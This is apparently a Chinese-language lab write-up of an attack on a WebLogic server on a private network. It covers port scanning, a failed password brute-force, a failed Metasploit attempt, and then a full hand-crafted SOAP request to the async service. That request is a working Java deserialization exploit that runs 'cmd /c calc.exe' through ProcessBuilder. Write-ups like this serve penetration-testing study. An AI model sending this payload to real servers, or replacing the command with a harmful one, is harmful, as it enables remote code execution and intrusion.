端口扫描
174.140端口扫描结果:
174.141端口扫描结果:
Weblogic漏洞扫描
174.140的7001端口是Weblogic的端口,用Weblogic漏洞扫描工具进行扫描:
找到了管理后台,尝试了简单的口令爆破,木有成功,另外还发现了SSRF漏洞和Java反序列化漏洞,SSRF漏洞可以用来探测内网服务器以及端口是否存在。关闭上帝视角,目前是不知道内网网段的,猜起来也挺费劲,先试试Java反序列化漏洞。
漏洞利用
1.msf exp
msf有现成的exp,赶紧用起来:
木有执行成功,猜测原因可能是msf的攻击目标是Unix,而我的目标机器是Window。
2.手工命令执行
接下来借助burp手动执行:
POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.174.140:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 content-type: text/xml Connection: keep-alive Accept-Encoding: gzip, deflate Content-Length: 731 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>calc.exe</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>